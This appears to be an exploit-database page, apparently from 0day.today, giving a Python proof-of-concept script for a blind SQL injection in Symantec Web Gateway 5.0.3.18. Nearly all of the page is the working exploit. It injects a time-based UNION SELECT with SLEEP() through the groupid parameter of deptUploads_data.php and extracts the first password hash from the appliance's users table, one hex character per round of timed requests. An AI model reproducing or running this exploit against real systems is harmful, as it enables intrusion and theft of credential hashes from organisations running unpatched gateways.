[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Symantec Web Gateway 5.0.3.18 (deptUploads_data.php) Blind SQL Injection Vulnerability

Author
@_Kc57
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19078
Category
web applications
Date add
30-07-2012
Platform
php
#!/usr/bin/python
# @_Kc57
# Blind SQLi POC
# Dumps out the first available hash in the users table of spywall_db
 
import urllib
import time
from time import sleep
 
timing='2.5'
checks = 0
 
def check_char(i, pos):
    global timimg
    global checks
    checks += 1
    url = 'https://192.168.200.132/spywall/includes/deptUploads_data.php?groupid=1 union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);--' % (i,pos,timing)
    start = time.time()
    urllib.urlopen(url)
    end = time.time()
    howlong = end-start
    return howlong
 
def check_pos(pos):
 
    for m in range(0,16):
        output = check_char(m, pos)
        print "[*] Character %s - Took %s seconds" % (hex(m)[2:],output)
        if output > 2:
            return hex(m)[2:]
             
 
md5 = ''
start = time.time()
for y in range(1,33):
    print "Checking position %s" % (y)
    md5 += check_pos(y)
    print md5
    end = time.time()
    howlong = end-start
 
print "1st hash:%s" % (md5)
print "Found in %s queries" % (checks)
print "Found in %s" %(howlong)



#  0day.today [2024-07-07]  #